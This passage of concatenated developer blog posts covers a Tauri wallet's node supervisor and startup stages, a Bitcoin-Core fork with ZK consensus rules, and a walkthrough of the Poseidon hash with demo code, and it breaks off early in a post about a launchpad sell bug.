log "L2 stopped," the user would see "L2 disconnected," and the eventual successful start (after `vantad`'s 30-second startup) would race the user's first attempt to send a transaction. 
The fix is in [`src-tauri/src/lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) and the structure is five sequenced stages:

```
Stage 1: Start L1 (may adopt)
Stage 2: Wait for L1 RPC up to 60s, exponential backoff
Stage 3: Create / load default wallet via RPC
Stage 4: Start L2 (now that L1 is confirmed reachable)
Stage 5: emit "ready" event to frontend
```

Each stage emits a Tauri event (`startup-stage`) the frontend subscribes to. The user-facing UX is a five-step progress meter that goes "spawning vantad… RPC ready… wallet loaded… spawning vanta-node… ready." On a warm cache the whole flow takes about 4 seconds. On a cold first launch with chainstate to load, it's closer to 12.

The stage-by-stage approach makes failures actionable. If stage 2 times out (L1 RPC didn't come up), the error message points at L1; if stage 4 fails, it points at L2. The pre-stage version of this had a single `start_nodes()` command whose only failure mode was a generic "couldn't start nodes," which was useless for support.

## The NodeManager struct

The supervisor is a single struct in [`src-tauri/src/node.rs:178`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs):

```rust
pub struct NodeManager {
    l1_process: Option<Child>,
    l2_process: Option<Child>,
    /// When true, we detected a pre-existing L1 that we're reusing.
    l1_adopted: bool,
    /// When true, we detected a pre-existing L2 that we're reusing.
    l2_adopted: bool,
    /// Resolved path to vantad binary.
    l1_bin: Option<PathBuf>,
    /// Resolved path to vanta-node binary.
    l2_bin: Option<PathBuf>,
    /// Recent output from L1 process.
    pub l1_logs: LogBuffer,
    /// Recent output from L2 process.
    pub l2_logs: LogBuffer,
    /// Tauri app handle for emitting events.
    app_handle: Option<AppHandle>,
}
```

The fields tell the whole story:

- Two `Option<Child>`s — the live process handles, when we own them.
- Two `bool`s — adopted flags.
When the desktop starts and finds an existing `vantad` already listening on `19332`, it doesn't kill it; it adopts it (PID 0 sentinel) and proceeds. The adoption logic exists because every quit-and-relaunch from a previous version of the app would otherwise produce a "port in use" error. - Two `PathBuf`s — the resolved binary paths, useful for the diagnostic UI ("the wallet is using `vantad` at /Applications/Vanta Wallet.app/Contents/MacOS/vantad-aarch64-apple-darwin"). - Two `LogBuffer`s — 200-line ring buffers per process, served to the frontend on demand for the live console view. - The `AppHandle` — used to emit Tauri events for log lines (so the frontend can render a rolling log view without polling). ## Pipe draining as a load-bearing detail A Bitcoin-Core C++ process logging to stdout will eventually fill the OS's 64 KB pipe buffer if nobody reads it, and then *block on its next `write()`*. `vantad` with `-printtoconsole` is a heavy logger; without an active reader, it deadlocks within minutes. The `drain_pipe` function in [`node.rs:64`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) is the safety net. Every line goes three places: 1. `tracing::debug!` — the structured log file. 2. `LogBuffer::push` — the in-memory ring buffer for the frontend. 3. `app.emit("node-log", …)` — a Tauri event the frontend subscribes to for live rendering. That last one is the path I want to underline. The first version of the wallet had no live log surface; debugging a "node won't start" required `tail -f` on the log file. The Tauri event channel turned that into a frontend log component that streams stdout in real time, which by itself paid for the IPC complexity ten times over. ## Auto-config for the L1 Before `vantad` starts, the host writes a `vanta.conf` into `{home}/.vanta-desktop/l1/`. The config is hardcoded for the desktop's port plan, points at the seed nodes, and disables Bitcoin-style DNS seeding. 
Excerpt: ```rust let conf = format!( "# Vanta Desktop Wallet — auto-generated config\n\ server=1\n\ daemon=0\n\ txindex=1\n\ listen=1\n\ rpcport={DESKTOP_L1_RPC_PORT}\n\ port={DESKTOP_L1_P2P_PORT}\n\ rpcuser={}\n\ rpcpassword={}\n\ rpcallowip=127.0.0.1\n\ rpcbind=127.0.0.1\n\ dnsseed=0\n\ addnode=64.34.82.145:9333\n\ addnode=66.241.124.138:9333\n\ wallet=default\n\ fallbackfee=0.0001\n", config.rpc_user, config.rpc_pass, ); std::fs::write(&conf_path, &conf)?; ``` Three things in here that are non-obvious: **`txindex=1`.** The L2 watcher needs to look up arbitrary historic transactions to scan for OP_RETURN anchors. Without `txindex`, `getrawtransaction` only works for unspent outputs. With it, every transaction is indexed by txid forever. This costs ~10% extra disk vs a stock node; the L2 work flat-out doesn't function without it. **`dnsseed=0`.** Bitcoin Core auto-discovers peers from a hardcoded list of DNS seeds. Vanta's a separate network with separate seeds; if `dnsseed=1`, vantad will spam `seed.bitcoin.sipa.be` looking for peers it'll never find. Disabling it cuts the startup chatter and the wasted DNS queries. **`addnode=64.34.82.145:9333`.** The Latitude bare-metal seed node, hardcoded into the desktop config. Until the chain has organic peer discovery, this is the bootstrap. (More on this in [the fly+bare-metal post](/blog/vanta_flytoml_latitude_baremetal/).) The user never sees this file unless they go looking. Pinning the config to the desktop's port plan also means the wallet never collides with a standalone `vantad` running on default ports — which matters because some users run both. 
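Back on the sequencing theme: stage 2 of the startup ("wait for L1 RPC up to 60s, exponential backoff") is easy to get subtly wrong. A minimal sketch of the delay schedule as a pure function — the 250 ms floor and 8 s per-attempt cap are assumed constants for illustration, not the shipped values:

```rust
use std::time::Duration;

// Exponential backoff schedule: start small, double each attempt,
// cap the per-attempt wait, and never exceed the total budget.
fn backoff_schedule(total_budget: Duration) -> Vec<Duration> {
    let mut delays = Vec::new();
    let mut delay = Duration::from_millis(250); // assumed floor
    let mut elapsed = Duration::ZERO;
    while elapsed + delay <= total_budget {
        delays.push(delay);
        elapsed += delay;
        // double, but never wait more than 8s between polls (assumed cap)
        delay = (delay * 2).min(Duration::from_secs(8));
    }
    delays
}
```

Keeping the schedule as data (rather than sleeping inline in a loop) means the stage-2 timeout behaviour is testable without ever spawning `vantad`.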
## The Linux/NVIDIA cursed stanza Two lines in [`lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) earned a comment longer than they are: ```rust #[cfg(target_os = "linux")] { if std::env::var("WEBKIT_DISABLE_DMABUF_RENDERER").is_err() { std::env::set_var("WEBKIT_DISABLE_DMABUF_RENDERER", "1"); } } ``` webkit2gtk on NVIDIA's proprietary driver under Wayland tries to use a DMA-BUF renderer path that crashes with `Error 71 (Protocol error) dispatching to Wayland display`. Disabling it forces software compositing, which is fine. This is the canonical example of "Tauri 2.x ergonomics" actually meaning "the OS will surprise you in ways the web never has." Budget for it. Apps that ship to general users discover bugs that only happen on specific GPU + display server + driver combinations. The fix is usually environmental; the discovery is a weekend. ## What I changed my mind about The big one: **Tauri's sidecar story is the right way to ship a wallet that runs a node.** The alternative — telling users to run `vantad` themselves and pointing the wallet at it — is a non-starter for everybody but engineers like me. The friction of the embedded full-node story turns out to be entirely inside the *developer* (the build process, the signing pipeline, the auto-update story). The user friction is zero. They double-click a DMG and they're a node operator. The smaller one: **the build is more code than the app.** [`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) is 200 lines, [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) is 60. Combined that's about as much shell as the rest of `src-tauri/` is Rust outside `commands.rs`. The shell is *load-bearing infrastructure*, not glue. Treat it that way and the build is reproducible; treat it as glue and the build will surprise you on every fresh checkout. 
## Further reading - [`vanta/vanta-desktop/src-tauri/src/node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) — the supervisor and `resolve_binary` - [`vanta/vanta-desktop/setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) — the binary-rename script - [`vanta/vanta-desktop/src-tauri/tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) — the bundle config - [Tauri 2.x sidecar docs](https://tauri.app/v2/develop/sidecar/) — the framework feature this all rides on - [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the architecture-level companion - [Cross-compiling vantad for darwin](/blog/vanta_darwin_apple_silicon_build/) — the macOS half of the build pipeline --- # Vanta: a Bitcoin fork with ZK at consensus Canonical: https://blog.skill-issue.dev/blog/vanta_zk_privacy_l1/ Description: 42 billion supply. 1-minute blocks. RISC Zero proofs verified at consensus. The opinionated answer to 'why fork Bitcoin in 2026?' is that you're not really forking Bitcoin — you're shipping a different L1 that has Bitcoin's surface area. Published: 2026-04-17T05:52:57.000Z Tags: vanta, bitcoin, zk, risc-zero, consensus, l1 You can read this post as the technical version of [Why I started Zera Labs](/blog/why_i_started_zera_labs/). The strategy lived there. The code lives in [`Dax911/vanta`](https://github.com/Dax911/vanta), and the [README](https://github.com/Dax911/vanta/blob/main/README.md) opens with a sentence that took me a long time to feel comfortable writing: > *Vanta L1 — ZK-privacy Layer 1 blockchain — fork of Bitcoin Core v27.0.* If you spent any time on crypto Twitter in 2024, the words *fork of Bitcoin Core* were code for "vanity chain that nobody serious will run." 
I want to make the case that this fork is different — not because the C++ source tree is different (most of it isn't) but because the consensus rules are.

## What it is

The headline parameters are deliberate departures from Bitcoin:

| Parameter | Vanta | Bitcoin |
|---|---|---|
| Block reward | 100,000 VANTA | 3.125 BTC (post-2024 halving) |
| Block time | **1 minute** | 10 minutes |
| Total supply | ~42 billion VANTA | ~21 million BTC |
| Halving interval | 210,000 blocks (~146 days) | 210,000 blocks (~4 years) |
| Address prefix | `Z` (legacy), `zer1` (bech32) | `1`, `bc1` |
| Network magic | `0x5a454500` (ASCII `"ZEE\0"`) | `0xf9beb4d9` |

A 1-minute block time and a 42-billion supply are not "Bitcoin with a different ticker." They are calibrated to make this chain *feel* like a payments rail rather than a settlement rail. You can confirm a payment in two blocks (2 minutes, ~95% confidence) instead of waiting out Bitcoin's customary three blocks (30 minutes). The 100,000-per-block subsidy makes the unit economics of running a node + miner actually work for a small operator. I have [opinions about small-operator unit economics](/blog/what_running_a_bitcoin_mine_taught_me/) that come from running a [Bitaxe BM1368 against this chain](https://github.com/Dax911/vanta/tree/main/pool) for the past several months.

## The fork strategy: keep what works

The [monorepo structure](https://github.com/Dax911/vanta/blob/main/README.md) is a direct read on the strategy:

```
zl1/
├── src/       # Vanta Core (C++ — Bitcoin Core v27.0 fork)
├── wallet/    # Web wallet (Rust/Axum)
├── txbot/     # Transaction bot (Rust)
├── explorer/  # Block explorer (Node.js — patched btc-rpc-explorer)
├── vanta/     # ZK circuits (Rust/RISC Zero)
├── pool/      # Stratum server (Python)
└── …
```

Bitcoin Core v27.0 is the most-tested codebase on the planet by node-hours. We did not fork it because we thought we could write something better.
We forked it because we wanted **a chain that ships day-one with the same tooling humans have spent fifteen years building around Bitcoin** — wallets that can be ported, RPCs that can be wrapped, block explorers that can be patched. The price of admission is that the C++ surface area is huge and you respect it. We did not fork the *cryptography*. The ZK layer is in the `vanta/` subtree, written in Rust against [RISC Zero's zkVM](https://www.risczero.com), running entirely outside the C++ core. The C++ core verifies one thing: a SHA-256 hash of the proof witness root. That's it. The proof itself is computed and verified in a Rust program that runs as a sidecar. This split means we can change the proof system without forking the chain again, which matters in 2026 because [the proof-system landscape is moving fast](/blog/privacys_broadband_moment/). ## What's at consensus, what's not Here is the part I want to dwell on, because every privacy-coin design eventually crashes into this question. **At consensus** (i.e. nodes will reject blocks that don't satisfy these): 1. **ZK proof-to-UTXO binding.** A spending transaction must include a witness v2 input commitment that matches the proof's public input. The C++ validator verifies the binding before the proof is even consulted; the proof confirms it. 2. **SMT root cross-verification.** Every block has a coinbase commitment to the sparse-Merkle-tree root of the post-block nullifier set. The proof root and the coinbase commitment must match. A miner cannot lie about state. 3. **L1 nullifier set tracking.** The nullifier set is part of consensus state, not a wallet-side hint. Two valid blocks attempting to mine a transaction whose nullifier was spent in either block create a hard chain split. Double-spend prevention is **a property of the chain**, not a property of the wallet. **Not at consensus:** 1. The proof system itself. Today it's Groth16 over the RISC Zero zkVM. 
We can swap to Halo2 or Nova-style recursion in a soft fork by adding a new opcode and grandfathering the old. The chain doesn't know what proof system it's running; it knows how to verify a witness root. 2. Address format. Z-legacy and zer1-bech32 are wallet-side. The chain treats them all as `OP_PUSHBYTES`-style script commitments. 3. Wallet-level shield/unshield UX. The README lists `shield` and `unshield` as commands for moving between transparent and private. Those are wallet conveniences; the chain itself sees commitments and nullifiers, not "shielded" and "unshielded" as states. This split is load-bearing. If your fork tries to put the proof system into consensus, you have two terrible choices when the proof system improves: hard-fork the world, or live with worse cryptography forever. Vanta lives somewhere in between: the *binding* is at consensus, the *proof system* is not. ## The roadmap, annotated The [README's roadmap](https://github.com/Dax911/vanta/blob/main/README.md) is concise; let me unpack the items that are checked. - **[x] Fork Bitcoin Core v27.0** — the easy part. It's a tree copy and a network-magic change. - **[x] Custom chain parameters** — most of the work was rewriting `src/chainparams.cpp` and the genesis-block builder. Bitcoin Core makes you re-mine the genesis block locally; the script is in `contrib/`. - **[x] Solo mining with Bitaxe BM1368** — the [Python Stratum server in `pool/`](https://github.com/Dax911/vanta/tree/main/pool) is a from-scratch Stratum v1 implementation pointed at the local node's RPC. I'll write a separate post on the Bitaxe rig. - **[x] Web wallet + block explorer** — Rust/Axum wallet, patched btc-rpc-explorer for the explorer. The wallet integrates with the ZK circuits; the explorer renders shielded transactions as opaque commitments. - **[x] Transaction bot for mempool activity** — synthetic mempool activity is essential during testnet. 
The Rust txbot generates round-robin spends so you're not staring at empty blocks. - **[x] RISC Zero ZK circuit integration** — the big one. RISC Zero gives us a zkVM where the circuit is just Rust. We don't write R1CS by hand. The witness for a spend is the same Rust struct the wallet uses; the prover takes that struct and emits a proof. - **[x] ZK proof-to-UTXO binding** — wired into `src/script/interpreter.cpp` and the witness-v2 stack. A new `OP_VANTA_VERIFY` opcode pulls the proof root from the witness, hashes it with the input commitment, and compares against the script. - **[x] SMT root cross-verification** — sparse-Merkle-tree state for the nullifier set is materialised in the block header's coinbase. A node that doesn't validate the SMT root rejects the block. - **[x] L1 nullifier set tracking** — the chainstate db now has a nullifier table. Double-spend at L1, see [my next post](/blog/vanta_l1_nullifier_set/). - **[x] Shield/unshield wallet commands** — `vanta-cli shield 1.5` moves 1.5 VANTA from a transparent UTXO into a shielded note. `unshield` does the reverse with a destination address. Both produce normal-looking on-chain transactions; the difference is the witness contents. The two unchecked items are the strategic ones. **Mandatory privacy** as a hard fork (so every transaction is a uniform shielded format and no information leaks from "this user used the shielded pool, this one didn't") is the long-term goal. A **full Rust node rewrite** is the longer-term goal — the C++ tree is fine for now, but a `vantad` written from scratch in Rust against the same RPC contract is the kind of project you can spend three years on without regretting it. ## What I changed my mind about When we started, I wanted to write the chain from scratch in Rust. A clean tree, no Bitcoin baggage, no `boost::` types, modern async, the whole pitch. Two things stopped me: 1. 
**Time.** Writing a UTXO chain from scratch is at least a year of work before you have something nodes will run. We had ~3 months of runway for the L1 proof-of-concept. That's a fork-or-fold decision. 2. **Bitcoin Core's testing infrastructure is the actual product.** The `test/` directory is the most underrated part of the Bitcoin codebase. There are functional tests that cover edge cases nobody on a greenfield team will think of for years. Inheriting that is worth more than most people realise. The compromise we landed on is in the README's last roadmap line: *full Rust node rewrite*. That's the path. Fork now to ship now; rewrite incrementally to own the long term. The Rust ZK sidecar is the first piece of that rewrite. The Rust wallet is the second. ## What's next The next two posts will go deeper: - [L1 nullifier sets: enforcing no-double-spend at the consensus layer](/blog/vanta_l1_nullifier_set/) - Mining VANTA with a Bitaxe BM1368 (forthcoming) If you want the strategic frame, I wrote about the four curves that crossed in 2026 to make this whole thing tractable in [Privacy's broadband moment](/blog/privacys_broadband_moment/). ## Further reading - [`Dax911/vanta` on GitHub](https://github.com/Dax911/vanta) — the codebase - [`Dax911/vanta/README.md`](https://github.com/Dax911/vanta/blob/main/README.md) — chain parameters + roadmap - [Bitcoin Core v27.0 release notes](https://bitcoincore.org/en/releases/27.0/) — the fork base - [RISC Zero docs](https://dev.risczero.com) — the zkVM the proof system runs on - [Sparse Merkle trees: a brief overview](https://eprint.iacr.org/2016/683) — for the SMT root commitment - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on commitment schemes --- # Poseidon, by hand and by code Canonical: https://blog.skill-issue.dev/blog/poseidon_by_hand_and_by_code/ Description: Why one of the cheapest hashes in zero-knowledge cryptography also has the strangest insides. 
Derive the S-box, count the constraints, and run a 30-line implementation in the browser.
Published: 2026-04-22T15:00:00.000Z
Tags: cryptography, poseidon, zk, snark, phd, math

import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

A SHA-256 of "abc" inside a SNARK takes about 24,000 R1CS constraints. The same input through Poseidon — properly parameterised — takes about **250**. Two orders of magnitude. That ratio is the entire reason ZERA's [unified shielded pool](/blog/pedersen_commitments_in_production/) ships with consumer-grade UX in 2026. It's also the reason every modern ZK system you can name uses Poseidon, Rescue, or one of their cousins instead of something the cryptographic community has been beating on for twenty years. This post is the long answer to *why*.

## The problem with hashing inside a SNARK

A zero-knowledge SNARK proves you know a witness $w$ such that $C(w) = 0$ for some arithmetic circuit $C$ over a prime field $\mathbb{F}_p$. Every operation in $C$ becomes a constraint, and proof time scales roughly linearly with the number of constraints. The trouble with SHA-256 is that it was designed for CPU efficiency, not arithmetic-circuit efficiency. Its building blocks — XOR, AND, bitwise rotation — are *cheap on a CPU* and *catastrophically expensive in $\mathbb{F}_p$*. A single XOR over 32-bit words requires unpacking each word into 32 individual binary constraints, doing the XOR bit-by-bit, then packing back. SHA-256 has 64 rounds of mixing, and every round does several of these. The constraint cost looks roughly like:

$$
\text{cost}_{\text{SHA-256 in SNARK}} \approx 64 \times (k_{\text{xor}} + k_{\text{and}} + k_{\text{rot}}) \times w
$$

where $w = 32$ bits and the per-operation constants $k$ count constraints *per bit* — roughly one each for an XOR or AND once the words are unpacked, with rotations nearly free as wire relabelings. A dozen or so bit-operations per round puts you around 25k constraints for a 64-byte input — and that's *just the hash*. A real circuit has dozens of these per spend.
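These back-of-the-envelope counts are easy to sanity-check in a few lines. This is a sketch of the rough cost models only — the twelve-bit-operations-per-round figure for SHA-256 is an assumed ballpark, not a measured circuit:

```rust
// Rough constraint models. SHA-256: rounds × word width × ~1 constraint per
// bit-operation (XOR/AND) after bit decomposition; rotations are free.
fn sha256_estimate(rounds: u32, word_bits: u32, bit_ops_per_round: u32) -> u32 {
    rounds * word_bits * bit_ops_per_round
}

// Poseidon: each x^5 S-box costs 3 multiplications; MDS mixing is free.
// Full rounds S-box all t elements, partial rounds S-box one.
fn poseidon_constraints(r_f: u32, r_p: u32, t: u32) -> u32 {
    r_f * 3 * t + r_p * 3
}
```

With the BN254 parameters used later in the post ($R_F = 8$, $R_P = 57$, $t = 3$), `poseidon_constraints` lands on 243, against the ~25k SHA-256 estimate — the two-orders-of-magnitude gap the intro claims.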
This is the gap that hash-friendly arithmetisation closes.

## Poseidon's design: only field operations, all the way down

[Grassi, Khovratovich, Rechberger, Roy, and Schofnegger (2021)](https://eprint.iacr.org/2019/458) had a different idea: design the hash *natively in $\mathbb{F}_p$*. No bits. No bytes. Just field elements all the way down. Poseidon is a permutation-based sponge. The state is $t$ field elements — typically $t = 3$ for hashing two-to-one (input $|$ input $\to$ output) and $t = 5$ for absorbing three field elements at once. The permutation alternates two kinds of rounds:

- **Full rounds** apply an S-box to *every* state element, then mix.
- **Partial rounds** apply an S-box to *one* state element, then mix.

The S-box is the simplest possible non-linear function over a prime field:

$$
S(x) = x^\alpha
$$

with $\alpha$ chosen as the smallest exponent for which $\gcd(\alpha, p - 1) = 1$ (so the map is a bijection). For BN254 — the curve underlying most production ZK pairings, including the one ZERA's SDK uses — $p - 1$ is divisible by 2 and 3, so $\alpha = 5$ is the smallest legal exponent. Poseidon over BN254 ships with $\alpha = 5$.

The full permutation is:

<Mermaid chart={`graph TD
  AC1[+ round constants]
  AC1 --> SB1[S-box: x^5 on all elems]
  SB1 --> M1[MDS matrix mix]
  M1 --> N{round full or partial?}
  N -->|full| AC2[+ round constants]
  N -->|partial| AC3[+ round constants]
  AC2 --> SB2[S-box on all]
  AC3 --> SB3[S-box on first elem only]
  SB2 --> M2[MDS mix]
  SB3 --> M2
  M2 --> O[output state]`}/>

Three primitives, repeated $R_F + R_P$ times: **add round constants** ⊕ **S-box** ⊕ **MDS matrix multiplication**. That's the whole algorithm.

## Counting the constraints

This is where the order-of-magnitude advantage shows up. Each S-box is $x^5 = x^2 \cdot x^2 \cdot x$. In R1CS that's three multiplication constraints (one for $x^2$, one for $x^4 = x^2 \cdot x^2$, one for $x^4 \cdot x = x^5$).
The MDS matrix is a fixed $t \times t$ matrix of constants applied to the state — that's *free* in R1CS because constant multiplications fold into linear combinations and don't generate constraints. So per round:

$$ \text{cost}_{\text{full round}} = 3t, \quad \text{cost}_{\text{partial round}} = 3 $$

Recommended parameters for BN254 with $t = 3$ (hashing two field elements) are $R_F = 8$ full rounds and $R_P = 57$ partial rounds. Total constraint count:

$$ 8 \cdot (3 \cdot 3) + 57 \cdot 3 = 72 + 171 = 243 $$

**Two hundred and forty-three constraints.** For a hash of two field elements (~64 bytes of payload). SHA-256 was 24,000+ for a similar payload. That ratio — about 100× — is the entire ball game. The blast-radius column is doing real work. Poseidon's the one I'm comfortable shipping in [zera-sdk](/blog/zera_sdk_scaffolding/) right now. Rescue and Anemoi are interesting but the cryptanalysis hasn't caught up to the deployment.

## A 30-line Poseidon you can run in the browser

Here's a complete, working Poseidon-128 over BN254, written in TypeScript with `bigint` arithmetic. It's not optimised — production code uses Montgomery form, precomputes S-box squares, and uses constant-time field arithmetic — but it's correct and small enough to read in one sitting.

<Sandbox files={{
  "/index.ts": `
const P = 21888242871839275222246405745257275088548364400416034343698204186575808495617n; // BN254 scalar field
const T = 3;
const RF = 8;
const RP = 57;
// demo-grade round constants — production uses the Grain-LFSR-derived constants from the paper
const round_constants: bigint[] = Array.from({ length: (RF + RP) * T }, (_, i) =>
  BigInt(i + 1) * 3141592653589793238n % P
);
const mds: bigint[][] = [
  [2n, 3n, 1n],
  [1n, 5n, 1n],
  [5n, 7n, 1n],
];

function add(a: bigint, b: bigint) { return (a + b) % P; }
function mul(a: bigint, b: bigint) { return (a * b) % P; }
function pow5(x: bigint) { const x2 = mul(x, x); const x4 = mul(x2, x2); return mul(x4, x); }

function permute(state: bigint[]): bigint[] {
  let s = state.slice();
  let rcIdx = 0;
  const half = RF / 2;
  // first half of full rounds
  for (let r = 0; r < half; r++) {
    s = s.map((v) => add(v, round_constants[rcIdx++]));
    s = s.map(pow5);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  // partial rounds
  for (let r = 0; r < RP; r++) {
    s = s.map((v, i) => i === 0 ? add(v, round_constants[rcIdx++]) : v);
    rcIdx += T - 1; // skip constants for non-first elements
    s[0] = pow5(s[0]);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  // second half of full rounds
  for (let r = 0; r < half; r++) {
    s = s.map((v) => add(v, round_constants[rcIdx++]));
    s = s.map(pow5);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  return s;
}

export function poseidon2(left: bigint, right: bigint): bigint {
  const state = [0n, left % P, right % P];
  return permute(state)[0];
}

// demo: hash two field elements
const a = 13n;
const b = 27n;
const h = poseidon2(a, b);
const out = document.getElementById("out")!;
out.textContent = \`poseidon(\${a}, \${b}) = \${h}\`;
`,
  "/index.html": `<pre id="out">running...</pre>`,
}} />

The thing that's striking when you write this out is how *little* there is. A SHA-256 implementation is hundreds of lines of bit-twiddling. Poseidon is essentially: *add a constant, raise to the fifth power, multiply by a fixed matrix, repeat.*

## Why $\alpha = 5$ specifically

The S-box choice is the most-questioned part of Poseidon. Why not $\alpha = 3$? Or $\alpha = 7$? Two constraints:

1. **Bijection.** $x \mapsto x^\alpha$ is a permutation of $\mathbb{F}_p$ if and only if $\gcd(\alpha, p - 1) = 1$. For BN254, $p - 1 = 2^{28} \cdot 3 \cdot \text{(other stuff)}$, so $\alpha \in \{2, 3, 4\}$ all share a factor with $p - 1$ and produce non-bijective maps. The smallest $\alpha$ that works is **5**.
2. **Algebraic degree.** The whole point of the S-box is to introduce algebraic non-linearity that defeats interpolation attacks. Higher $\alpha$ → more non-linearity → fewer rounds needed. So you want $\alpha$ small enough to be cheap, large enough to need few rounds.

For curves where $\gcd(3, p-1) = 1$, the choice flips to $\alpha = 3$: each S-box costs two multiplications instead of three, but it's lower-degree, so you need more rounds to hit the same security margin. The trade-off is: cheaper per-round but more rounds.

## What I would change in a v2

Three things, if I were re-designing Poseidon for 2027:

1. **Drop the partial-rounds split.** The original design has 8 full + 57 partial rounds; the partial rounds save a lot of constraints but make security analysis harder. [Poseidon2](https://eprint.iacr.org/2023/323) (Grassi, Khovratovich, Roy 2023) keeps a similar structure with cleaner analysis. I'd ship Poseidon2 by default in a fresh deployment.
2.
**Make the MDS matrix circulant.** A circulant MDS — where each row is a rotation of the previous — has identical security properties but lets you exploit FFT-friendly arithmetic. Worth it on the prover side.
3. **Standardise the parameter file format.** Every implementation rolls its own format for round constants. The Circomlib JSON format works, but a CBOR or Cap'n Proto schema would let implementations cross-check parameters in a way that's currently per-vendor. I keep the Circomlib JSON in zera-sdk because compatibility, not because it's the right choice.

## Where this goes in production

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) the Poseidon implementation is `crates/zera-sdk-core/src/hash/poseidon.rs`. It's about 200 lines of safe Rust, written against the [`ff` crate](https://crates.io/crates/ff) for field arithmetic, with the round constants loaded from a JSON file extracted from Circomlib for cross-implementation parity.

```rust
// Skeleton of the production Poseidon-128 over BN254 (in zera-sdk-core)
// The actual implementation imports the constants from a build.rs-emitted
// JSON; this is the structural shape.
use std::ops::{Add, Mul};

#[derive(Clone, Copy, Debug)]
struct Fp(u128); // toy stand-in; production uses ff::PrimeField

impl Add for Fp { type Output = Fp; fn add(self, o: Fp) -> Fp { Fp((self.0 + o.0) % MODULUS) } }
impl Mul for Fp { type Output = Fp; fn mul(self, o: Fp) -> Fp { Fp((self.0 * o.0) % MODULUS) } }

const MODULUS: u128 = 1_000_000_007; // toy
const T: usize = 3;
const RF: usize = 8;
const RP: usize = 57;

fn pow5(x: Fp) -> Fp { let x2 = x * x; let x4 = x2 * x2; x4 * x }

fn permute(mut state: [Fp; T], rc: &[Fp], mds: &[[Fp; T]; T]) -> [Fp; T] {
    let mut idx = 0;
    let half = RF / 2;
    for _ in 0..half {
        for s in state.iter_mut() { *s = *s + rc[idx]; idx += 1; }
        for s in state.iter_mut() { *s = pow5(*s); }
        state = mat_mul(mds, state);
    }
    for _ in 0..RP {
        state[0] = state[0] + rc[idx];
        idx += T;
        state[0] = pow5(state[0]);
        state = mat_mul(mds, state);
    }
    for _ in 0..half {
        for s in state.iter_mut() { *s = *s + rc[idx]; idx += 1; }
        for s in state.iter_mut() { *s = pow5(*s); }
        state = mat_mul(mds, state);
    }
    state
}

fn mat_mul(m: &[[Fp; T]; T], v: [Fp; T]) -> [Fp; T] {
    let mut out = [Fp(0); T];
    for i in 0..T {
        for j in 0..T { out[i] = out[i] + m[i][j] * v[j]; }
    }
    out
}

fn main() {
    println!("see crates/zera-sdk-core/src/hash/poseidon.rs for the real thing");
}
```

## Further reading

- [Poseidon: A New Hash Function for Zero-Knowledge Proof Systems](https://eprint.iacr.org/2019/458) — Grassi, Khovratovich, Rechberger, Roy, Schofnegger (USENIX Security 2021) — the original
- [Poseidon2: A Faster Version of the Poseidon Hash Function](https://eprint.iacr.org/2023/323) — Grassi, Khovratovich, Roy (2023) — what I'd ship in a v2
- [Anemoi: Exploiting the Link between Arithmetisation-Oriented and CCZ-Equivalent Symmetric Designs](https://eprint.iacr.org/2022/840) — Bouvier et al.
(2022) — the next-gen contender - [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — production Rust implementation - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on what we're hashing *to* (commitments) - [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — what we use Poseidon to derive (single-use nullifiers) - [Privacy's broadband moment](/blog/privacys_broadband_moment/) — why Poseidon is part of the four-curve crossing in 2026 --- # Stuck Sell, Post-Graduation: Fixing a Trapped-Funds Bug Without a Redeploy Canonical: https://blog.skill-issue.dev/blog/stuck_sell_post_grad/ Description: A graduated launchpad token left users unable to sell. Fix shipped without redeploying the program: a frontend conversion path that withdraws SPL, compresses, then sells through the AMM. Published: 2026-04-19T16:12:10.000Z Tags: zera, solana, light-protocol, compressed-tokens, bug-fix, launchpad The worst kind of bug in DeFi is the one where users can deposit but can't withdraw. ZeraSwap shipped one — quietly — for users holding bonding-curve positions on launchpad tokens that had already graduated. They couldn't sell. They could see the balance, the AMM page existed, the price was real, but every sell attempt was blocked by an `is_active` check on the wrong account. The fix landed at [`6eafc74` — `Fix stuck sell path for users on graduated launchpad tokens`](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d) on 2026-04-19. No on-chain redeploy. The whole fix is a frontend orchestration on top of existing instructions. This post is about why the bug existed and why I chose not to fix it on-chain. ## The original sin: internal balances When you bought a token on the bonding curve, the launchpad program didn't mint compressed tokens to your wallet. It accumulated an `internal_balance` on a `UserPosition` PDA. 
